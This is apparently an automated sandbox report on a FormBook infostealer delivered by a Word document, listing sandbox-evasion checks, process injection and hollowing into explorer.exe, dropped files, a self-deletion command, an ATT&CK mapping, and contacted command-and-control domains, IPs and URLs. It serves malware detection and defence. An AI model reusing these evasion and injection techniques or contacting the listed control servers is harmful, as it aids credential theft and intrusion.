          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000001285E4 second address: 00000000001285EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 000000000012897E second address: 0000000000128984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004088B0 rdtsc 6_2_004088B0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exe TID: 2308Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2820Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2960Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe TID: 2252Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2496Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NAPSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\Jump to behavior
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.2148310732.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000007.00000000.2148237978.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2137478311.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004088B0 rdtsc 6_2_004088B0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00409B20 LdrLoadDll,6_2_00409B20
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009526F8 mov eax, dword ptr fs:[00000030h]6_2_009526F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02130080 mov ecx, dword ptr fs:[00000030h]12_2_02130080
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021300EA mov eax, dword ptr fs:[00000030h]12_2_021300EA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021526F8 mov eax, dword ptr fs:[00000030h]12_2_021526F8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009526F8 mov eax, dword ptr fs:[00000030h]15_2_009526F8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C26F8 mov eax, dword ptr fs:[00000030h]16_2_008C26F8
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.141 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 50.117.11.156 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory written: C:\Users\user\AppData\Roaming\skypound83892.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: CD0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.2137451244.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2390144478.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 0000000C.00000002.2390168426.0000000000D20000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeQueries volume information: C:\Users\user\AppData\Roaming\skypound83892.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323039 Sample: VOMAXTRADING.doc Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 50 www.akasyaofistasima.com 2->50 52 akasyaofistasima.com 2->52 62 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Multi AV Scanner detection for submitted file 2->66 68 7 other signatures 2->68 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 336 20 2->16         started        18 EQNEDT32.EXE 2->18         started        signatures3 process4 dnsIp5 54 sea-shared-5.masterns.com 104.168.198.45, 49167, 80 HOSTWINDSUS United States 11->54 46 C:\Users\user\AppData\...\skypound83892.exe, PE32 11->46 dropped 48 C:\Users\user\AppData\...\skypoundx[1].exe, PE32 11->48 dropped 86 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->86 20 skypound83892.exe 2 7 11->20         started        file6 signatures7 process8 file9 44 C:\Users\user\AppData\Roaming\...\firefos.exe, PE32 20->44 dropped 70 Machine Learning detection for dropped file 20->70 72 Tries to detect virtualization through RDTSC time measurements 20->72 74 Injects a PE file into a foreign processes 20->74 24 skypound83892.exe 20->24         started        signatures10 process11 signatures12 76 Modifies the context of a thread in another process (thread injection) 24->76 78 Maps a DLL or memory area into another process 24->78 80 Sample uses process hollowing technique 24->80 82 Queues an APC in another process (thread injection) 24->82 27 explorer.exe 3 24->27 injected process13 dnsIp14 56 mycapecrusade.com 34.102.136.180, 49170, 80 GOOGLEUS United States 27->56 58 www.opel-occasions-ales.com 50.117.11.156, 49168, 80 EGIHOSTINGUS United States 27->58 60 4 other IPs or domains 27->60 84 System process connects to network (likely due to code injection or exploit) 27->84 31 NAPSTAT.EXE 27->31         started        34 firefos.exe 27->34         started        36 firefos.exe 27->36         started        signatures15 process16 signatures17 88 Modifies the context of a thread in another process (thread injection) 31->88 90 Maps a DLL or memory area into another process 31->90 92 Tries to detect virtualization through RDTSC time measurements 31->92 38 cmd.exe 31->38         started        94 Injects a PE file into a foreign processes 34->94 40 firefos.exe 34->40         started        42 firefos.exe 36->42         started        process18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          VOMAXTRADING.doc43%VirustotalBrowse
          VOMAXTRADING.doc40%ReversingLabsDocument-RTF.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\skypound83892.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          15.2.firefos.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          16.2.firefos.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.skypound83892.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.opel-occasions-ales.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.runwithit.media/bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB0%Avira URL Cloudsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.opel-occasions-ales.com/bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA==0%Avira URL Cloudsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.opel-occasions-ales.com
          		50.117.11.156
          		truetrueunknown
          mycapecrusade.com
          		34.102.136.180
          		truetrue
            		unknown
